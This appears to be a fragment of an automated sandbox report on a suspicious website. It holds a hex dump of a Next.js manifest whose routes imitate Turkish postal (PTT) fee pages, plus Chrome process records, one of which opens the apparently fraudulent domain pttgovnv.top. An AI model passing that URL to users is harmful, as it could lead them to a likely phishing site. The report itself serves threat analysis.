          Data Ascii: self.__BUILD_MANIFEST=function(e,i,a,s,t,r,c,n,d,u,o,g,p,l,m,h,k,b,f,j,y,F,P,_,I){return{__rewrites:{beforeFiles:[],afterFiles:[],fallback:[]},"/":[i,a,s,t,r,"static/css/2425cba10de1645b.css","static/chunks/pages/index-dfb7e1261ea0e06f.js"],"/_error":["st
          2024-09-01 22:25:37 UTC1335INData Raw: 2d 75 63 72 65 74 69 2d 68 65 73 61 70 6c 61 6d 61 2f 6d 65 6b 74 75 70 2d 70 6f 73 74 61 73 69 2d 67 6f 6e 64 65 72 69 6c 65 72 69 2f 79 75 72 74 2d 64 69 73 69 2f 46 6f 72 65 69 67 6e 53 6d 61 6c 6c 50 61 63 6b 22 2c 22 2f 67 6f 6e 64 65 72 69 2d 75 63 72 65 74 69 2d 68 65 73 61 70 6c 61 6d 61 2f 6d 65 6b 74 75 70 2d 70 6f 73 74 61 73 69 2d 67 6f 6e 64 65 72 69 6c 65 72 69 2f 79 75 72 74 2d 64 69 73 69 2f 46 6f 72 65 69 67 6e 54 75 72 70 65 78 22 2c 22 2f 67 6f 6e 64 65 72 69 2d 75 63 72 65 74 69 2d 68 65 73 61 70 6c 61 6d 61 2f 74 65 6c 67 72 61 66 2d 67 6f 6e 64 65 72 69 6c 65 72 69 2f 54 65 6c 65 67 72 61 6d 22 2c 22 2f 68 61 62 65 72 6c 65 72 22 2c 22 2f 68 61 62 65 72 6c 65 72 2f 5b 73 6c 75 67 5d 22 2c 22 2f 6e 6f 74 66 6f 75 6e 64 22 2c 22 2f 73
          Data Ascii: -ucreti-hesaplama/mektup-postasi-gonderileri/yurt-disi/ForeignSmallPack","/gonderi-ucreti-hesaplama/mektup-postasi-gonderileri/yurt-disi/ForeignTurpex","/gonderi-ucreti-hesaplama/telgraf-gonderileri/Telegram","/haberler","/haberler/[slug]","/notfound","/s


          Click to jump to process

          Click to jump to process

          Click to jump to process

          Target ID:0
          Start time:18:25:03
          Start date:01/09/2024
          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
          Wow64 process (32bit):false
          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
          Imagebase:0x7ff76e190000
          File size:3'242'272 bytes
          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:false

          Target ID:2
          Start time:18:25:06
          Start date:01/09/2024
          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
          Wow64 process (32bit):false
          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 --field-trial-handle=1988,i,3916149718589674385,9428878303395557507,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Imagebase:0x7ff76e190000
          File size:3'242'272 bytes
          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:false

          Target ID:3
          Start time:18:25:09
          Start date:01/09/2024
          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
          Wow64 process (32bit):false
          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://pttgovnv.top/help/"
          Imagebase:0x7ff76e190000
          File size:3'242'272 bytes
          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:true

          No disassembly